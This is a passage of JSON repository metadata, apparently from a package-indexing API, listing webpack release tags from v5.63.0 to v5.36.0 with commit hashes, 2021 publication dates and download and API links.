0/manifests"},{"name":"v5.63.0","sha":"f011c70aacbd4dd3c4e518b9b9d8ea945dce0a9a","kind":"tag","published_at":"2021-11-09T19:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.63.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0/manifests"},{"name":"v5.62.2","sha":"3aed1fe0249f8730a35fab62e3cdc3b399b0b6e9","kind":"tag","published_at":"2021-11-09T11:12:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2/manifests"},{"name":"v5.62.1","sha":"daba59b3d60e7895543b6563682c209e4ad6b8b8","kind":"tag","published_at":"2021-11-05T16:26:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1/manifests"},{"name":"v5.62.0","sha":"04640dcc757c8b3e78c6cbf6e4dda7cbbde33fe2","kind":"tag","published_at":"2021-11-05T14:56:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0/manifests"},{"name":"v5.61.0","sha":"0306510f7d1b9b13900f1dcf78a767c2ed390a61","kind":"tag","published_at":"2021-10-29T14:00:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.61.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0/manifests"},{"name":"v5.60.0","sha":"f0298fe46fc22eebf42eb034a9435d7c19aeddd9","kind":"tag","published_at":"2021-10-25T16:20:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.60.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0/manifests"},{"name":"v5.59.1","sha":"3dbbdcb28cce3860247f06a18e48f536ab266834","kind":"tag","published_at":"2021-10-20T21:39:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1/manifests"},{"name":"v5.59.0","sha":"19ca23f062544263f48d2947da0ecfb29ae0bb36","kind":"tag","published_at":"2021-10-19T17:54:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0/manifests"},{"name":"v5.58.2","sha":"8a6d156c156282dd3d0ba001187c282402a1177f","kind":"tag","published_at":"2021-10-13T09:39:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2/manifests"},{"name":"v5.58.1","sha":"2eecffb2739d13d3095568d118ffc0baacec5cd8","kind":"tag","published_at":"2021-10-08T13:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1/manifests"},{"name":"v5.58.0","sha":"7666277551be32947227e80fb2fccdbbe656254b","kind":"tag","published_at":"2021-10-07T15:48:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0/manifests"},{"name":"v5.57.1","sha":"0581bb3c1c32bcb3e182a0f732b862a6c5bb7846","kind":"tag","published_at":"2021-10-05T18:25:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1/manifests"},{"name":"v5.57.0","sha":"e841ab01417f8e1dd6a2533638f848b5ad0c7d16","kind":"tag","published_at":"2021-10-05T15:06:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0/manifests"},{"name":"v5.56.1","sha":"ed55e200efb0dad7716d509c82a6ed82aee86c51","kind":"tag","published_at":"2021-10-04T07:32:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1/manifests"},{"name":"v5.56.0","sha":"4eb122092d9696ac5286bc2dcf3eacfb901f4fed","kind":"tag","published_at":"2021-10-01T14:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0/manifests"},{"name":"v5.55.1","sha":"e78403d6a8d4e682fbd4a0eb58f042866cfde42a","kind":"tag","published_at":"2021-09-29T08:56:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1/manifests"},{"name":"v5.55.0","sha":"5db30851c7ed007d8f94150ee2c6a1b47d10d388","kind":"tag","published_at":"2021-09-28T17:39:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0/manifests"},{"name":"v5.54.0","sha":"45829826701ff6582ea16bc36376d105ff264c26","kind":"tag","published_at":"2021-09-24T19:07:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.54.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0/manifests"},{"name":"v5.53.0","sha":"6796b73a1ab83739f0e722d914676c9dd58d65e2","kind":"tag","published_at":"2021-09-16T13:52:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.53.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0/manifests"},{"name":"v5.52.1","sha":"d95a0418b64bd366f0c51f2635ef0c24158b8bce","kind":"tag","published_at":"2021-09-10T08:55:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1/manifests"},{"name":"v5.52.0","sha":"4edd3800567f279edd7091af14b3385552a8972f","kind":"tag","published_at":"2021-09-03T15:27:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0/manifests"},{"name":"v5.51.2","sha":"684e22ec4d6e6221de8a4a8a6b3b8f37b863a09d","kind":"tag","published_at":"2021-09-02T13:24:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2/manifests"},{"name":"v5.51.1","sha":"d3da48e7e3da3042b7142fe3deced0bcaac3e704","kind":"tag","published_at":"2021-08-19T14:16:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1/manifests"},{"name":"v5.51.0","sha":"bd7cb37f1c0d872cfff9fc27c7db52a25e1ba6a3","kind":"tag","published_at":"2021-08-19T09:04:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0/manifests"},{"name":"v5.50.0","sha":"400a0f94ab45ca20b10f219c8311e87d3d3f108c","kind":"tag","published_at":"2021-08-10T18:31:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.50.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0/manifests"},{"name":"v5.49.0","sha":"d3868384c37f9d674d1db17a0198393bd213c763","kind":"tag","published_at":"2021-08-06T11:07:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.49.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.49.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.49.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0/manifests"},{"name":"v5.48.0","sha":"67f3aef3c11e2a8d9e7dc1e0300350588ebd7aec","kind":"tag","published_at":"2021-08-02T12:36:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.48.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.48.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.48.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0/manifests"},{"name":"v5.47.1","sha":"3f353b6ae29ae6d96e0ab86e7233b4c785f99c60","kind":"tag","published_at":"2021-07-29T14:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1/manifests"},{"name":"v5.47.0","sha":"efeb1287e52870036cc01b22476852205e99c31a","kind":"tag","published_at":"2021-07-27T14:27:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0/manifests"},{"name":"v5.46.0","sha":"a32b0fd041260f3303b9329c9a65cc4afe102390","kind":"tag","published_at":"2021-07-22T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0/manifests"},{"name":"v5.45.1","sha":"7102df3bb52a33529ff5db4fdf34484d2a359a49","kind":"tag","published_at":"2021-07-16T20:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1/manifests"},{"name":"v5.45.0","sha":"db52c58a4fb037ece22be6365f56c11bc78fb426","kind":"tag","published_at":"2021-07-16T15:50:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0/manifests"},{"name":"v5.44.0","sha":"f20158d4492e73d07a36cd1614dfbd1dc1ea143d","kind":"tag","published_at":"2021-07-08T19:37:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0/manifests"},{"name":"v5.43.0","sha":"b53a06437a3e8b2756c550c1be6ccb33fdba03d7","kind":"tag","published_at":"2021-07-06T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0/manifests"},{"name":"v5.42.1","sha":"4156b20644d309c0e8acaa1e22ca3a4fe546c0b6","kind":"tag","published_at":"2021-07-05T14:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1/manifests"},{"name":"v5.42.0","sha":"4fb45402eec7efe1c70e641cab7b24331948ea8d","kind":"tag","published_at":"2021-07-02T07:04:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0/manifests"},{"name":"v5.41.1","sha":"9ed05afbeaf87442d86863a20a6c30b0ab437fb5","kind":"tag","published_at":"2021-06-29T14:30:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1/manifests"},{"name":"v5.41.0","sha":"fd5dc9997671b4c4b32d15f722e06079cd5da2db","kind":"tag","published_at":"2021-06-28T16:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0/manifests"},{"name":"v5.40.0","sha":"5d297327bc1f208de16c29f5c9b31d2b8a06bce4","kind":"tag","published_at":"2021-06-21T16:25:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0/manifests"},{"name":"v5.39.1","sha":"e5ccd070f6c18794173d3f2e60445de5bc2f52a2","kind":"tag","published_at":"2021-06-17T10:21:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1/manifests"},{"name":"v5.39.0","sha":"e9f90450d5d8b4e796e5e0e9674869220ab73bcb","kind":"tag","published_at":"2021-06-14T21:31:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0/manifests"},{"name":"v5.38.1","sha":"487665cb69f7b1f1aac44097124ef8f33cfe247b","kind":"tag","published_at":"2021-05-27T21:12:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1/manifests"},{"name":"v5.38.0","sha":"daa0f1ed1cebc28c8cc9034f95f3b56e9253ec5e","kind":"tag","published_at":"2021-05-27T12:41:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0/manifests"},{"name":"v5.37.1","sha":"2a5ed4a2dcbe06e852f84a8e7f63145af87cb139","kind":"tag","published_at":"2021-05-19T06:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1/manifests"},{"name":"v5.37.0","sha":"a5821c74568d59a330043900328a018c5d3a4af7","kind":"tag","published_at":"2021-05-10T16:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0/manifests"},{"name":"v5.36.2","sha":"0e2e972a2d181c530bb7185278fe5cfc20724c22","kind":"tag","published_at":"2021-04-30T11:48:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2/manifests"},{"name":"v5.36.1","sha":"e9de77aae42bd8f7d799a21dd16c98206cd170f6","kind":"tag","published_at":"2021-04-28T18:57:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1/manifests"},{"name":"v5.36.0","sha":"c0a3394ae059ba30c90b7e84c3805dcfd918577d","kind":"tag","published_at":"2021-04-27T09:44:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/